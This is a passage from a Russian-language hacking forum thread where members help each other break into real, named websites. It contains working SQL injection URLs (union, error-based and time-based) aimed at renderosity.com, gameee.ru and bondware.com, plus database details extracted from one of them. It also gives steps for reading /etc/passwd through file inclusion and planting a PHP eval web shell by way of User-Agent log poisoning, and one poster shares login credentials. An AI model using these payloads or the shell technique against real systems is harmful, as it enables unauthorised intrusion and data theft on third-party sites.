Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. CyberKillerz

    CyberKillerz New Member

    Joined:
    19 Jun 2012
    Messages:
    23
    Likes Received:
    0
    Reputations:
    -5
    Походу пмогло тк после залития открылись все почти деректории. хотя хз тк там перед залитием они переименовывают их походу так что неизвестно поч так произошло.
     
    #20881 CyberKillerz, 2 Aug 2012
    Last edited: 2 Aug 2012
  2. Gaben7

    Gaben7 Member

    Joined:
    8 Jan 2012
    Messages:
    129
    Likes Received:
    9
    Reputations:
    6
    кол-во полей подобрать не смог
    всё время ошибка
    побывал так

    homepage.php?page=4&userid=1'+or+1=(select @@version)+and+1='1

    ошибка исчезла но увы результат 0
     
  3. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    943
    Likes Received:
    525
    Reputations:
    173
    Попробуй
    Браузер любой кроме firefox, да и пробелы убери
     
  4. Gaben7

    Gaben7 Member

    Joined:
    8 Jan 2012
    Messages:
    129
    Likes Received:
    9
    Reputations:
    6
    пробовал в 3 браузерах результат тот же.

    Там запятые фильтруются, backtick также фильтруется

    попробовал так
    PHP:
    /homepage.php?page=4&userid=dd1'+union+select * from(select 0 a1) a1 join(select 0 a2) a2 join(select 0 a3) a3 join(select 0 a4) a4 join(select 0 a5) a5 join(select 0 a6) a6+union+select+* from(select username from bwcore_member limit 0)x join(select avatar_url from bwcore_member+limit+0)xx join(select * from bcs_fav_vendor+limit+0)xxx+--+a
    ответ
    Code:
    Fatal error: MySQL error: Too many connections in /rn1/renderosity/public_html/classes/class.bw_Database.php(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code on line 162
     
  5. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    505
    Likes Received:
    105
    Reputations:
    53
    Дай линк, не мучай уже
     
  6. Gaben7

    Gaben7 Member

    Joined:
    8 Jan 2012
    Messages:
    129
    Likes Received:
    9
    Reputations:
    6
    да я давал удалили


    www.renderosity.com
     
    #20886 Gaben7, 2 Aug 2012
    Last edited: 2 Aug 2012
  7. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    329
    Likes Received:
    46
    Reputations:
    11
    помогите плз тоже со скулей,вроде версия 5.5.14 но таблицы не хочет выводить
    Code:
    http://www.gameee.ru/iframe/rate.php?id=1543&i=1%20AND%20%28SELECT%203716%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a76746e3a,%28SELECT%20version%28%29%29,0x3a6f72743a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29--+f
     
  8. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Похоже и не выведет. Я смог покрутить только через Time-Based SQL

    User: gameee_base@localhost
    Sql: 5.5.14
    DB: icmeee_base

    Вот тебе 2 способа на выбор

    Code:
    http://www.gameee.ru/iframe/rate.php?id=1543&i=1+and+if(substring((version()),1,1)=5,BENCHMARK(100000,MD5(0x41)),0)
    
    http://www.gameee.ru/iframe/rate.php?id=1543&i=1+and+sleep(substring((version()),1,1))
     
    _________________________
  9. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862

    Чёт меня постоянно в бан кидает. Надоели уже прокси.

    Вот что накопал - последние 2 запроса не чекал тк, опять в бане.

    Code:
    http://www.renderosity.com/homepage.php?page=4&userid=1'+group+by+88+--+    FALSE
    http://www.renderosity.com/homepage.php?page=4&userid=1'+group+by+87+--+    TRUE
    
    http://www.renderosity.com/homepage.php?page=4&userid=1'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87+--+
    
    http://www.renderosity.com/homepage.php?page=4&userid=1'+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87+--+
    Для авторизации можете заюзать мой акк BigBear-x/123456
     
    _________________________
    #20889 BigBear, 3 Aug 2012
    Last edited: 3 Aug 2012
    1 person likes this.
  10. Testosteron

    Testosteron New Member

    Joined:
    18 Jun 2010
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Решил попрактиковаться в Php inj,вобщем взял сайт из раздачи-вот "http://macrohosting.ru/?"
    Делаю запрос ../../../../etc/passwd (good),дальше пробую proc/self/environ выводится какая то елда в виде "?????????????????????????" Собственно вопрос:что это такое? и какие ещё есть способы залития шелла?. Читал про error.log но толком не понял как это делается.
     
  11. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    to Testosteron
    Если вкратце, то например вставляете в поле User-Agent мини шелл (например <? eval($_REQUEST[e];?>), вызываете ошибку, данные записываются в error.log, дальше вы инклудите этот файл (если конечно нашли его месторасположение на сервере) и дальше работаете с ним "http://macrohosting.ru/?file=../../../../var/logs/error.log&e=phpinfo();"
    UPD. Можете прочитать тут по этому поводу...
    Да и не забудьте проверить wrappers! ;)
     
    #20891 cat1vo, 5 Aug 2012
    Last edited: 5 Aug 2012
    1 person likes this.
  12. Testosteron

    Testosteron New Member

    Joined:
    18 Jun 2010
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Ага понятно. Спасибо за помощь)
    Пошёл изучать;)
     
  13. Sat-hacker

    Sat-hacker New Member

    Joined:
    19 May 2012
    Messages:
    98
    Likes Received:
    0
    Reputations:
    -10
    Подскажите где можна почитать о sql ?Как что подставлять.
     
  14. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,183
    Likes Received:
    618
    Reputations:
    690
    2Sat-hacker прочитать можно про скуль почти от А до Я на крупном хек сайте https://forum.antichat.ru/
    Ваш КЭП!
     
    _________________________
    2 people like this.
  15. Sat-hacker

    Sat-hacker New Member

    Joined:
    19 May 2012
    Messages:
    98
    Likes Received:
    0
    Reputations:
    -10
    shell_c0de а ссылочку на от а до я можна не могу найти.
     
  16. K800

    K800 Nobody's Fool

    Joined:
    25 Dec 2010
    Messages:
    2,191
    Likes Received:
    3,828
    Reputations:
    372
    http://forum.antichat.ru/thread43966.html
     
  17. Gaben7

    Gaben7 Member

    Joined:
    8 Jan 2012
    Messages:
    129
    Likes Received:
    9
    Reputations:
    6
    www.bondware.com
    помогите плз со скулей, версия '5.0.77-log'но таблицы не хочет выводить
    /?1'or(select*from(select(name_const(version(),1)),na me_const(version(),1))a)and(1)='1

    побывал так

    Code:
    1'or(select+1+from(select+count(*),concat((select+ table_name+from+information_schema.tables+limit+0, 1),floor(rand(0)*2))x+from+information_schema.tabl es+g  roup+by+x)a)and(1)='1
    если так

    Code:
    /?1'or(select/**/1/**/from(select/**/count(*),concat((select/**/table_name/**/from/**/information_schema.columns/**/limit/**/0,1),floor(rand(0)*2))x/**/from/**/information_schema.columns/**/group/**/by/**/x)a)and(1)='1


    то, что жирненькое, таблица limit 0,1
     
    #20897 Gaben7, 5 Aug 2012
    Last edited: 5 Aug 2012
  18. smirk

    smirk Elder - Старейшина

    Joined:
    8 Sep 2011
    Messages:
    137
    Likes Received:
    43
    Reputations:
    26
    2Gaben7, чем тебе еще помочь? на рдоте те уже и так все сделали...
    лимиты крути.
     
  19. cipa21

    cipa21 Elder - Старейшина

    Joined:
    9 Apr 2009
    Messages:
    548
    Likes Received:
    146
    Reputations:
    30
    Товарищи Гуру-инъектры! Вобщем даже незнаю как вам на пальцах объяснить....
    В скрипте запрос записывает данные, которые вписал юзер из формы, в БД.
    Code:
    INSERT INTO servers(map,ip,port,status) VALUES ($map,$ip,$port,$status);
    Когда в поле ввожу одинарную ковычку, то при отправке формы выскакивает ошибка на странице:
    "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '32', `map`='ggg', `status`='1' WHERE `ip`' at line 3"

    Я в поля уже и select @@version тыкал, оно просто отображает это как текст. Даже не знаю что и делать :(

    Может кто подскажет как это дело раскрутить до конца?
     
    #20899 cipa21, 6 Aug 2012
    Last edited: 6 Aug 2012
  20. apoclepsis

    apoclepsis New Member

    Joined:
    24 Jun 2010
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    всем привет! создаю сайт и параллельна изучаю sql. и натолкнулся на такую непонятку
    на форумах везде проверки уязвимости ТИПА ?advanced=1`(при таком запросе у меня `-фильтруется), а вот при запросе ?`dvanced=1 страница немного видоизменяется
    может ли это являтся уязвимостью и как проверить? проверка стандартным запросом - тоесть запрос после ?advanced=1. Типа ?advanced=1 union select... или же здесь запрос нужно вставлять между ? и advanced=1
     
Thread Status:
Not open for further replies.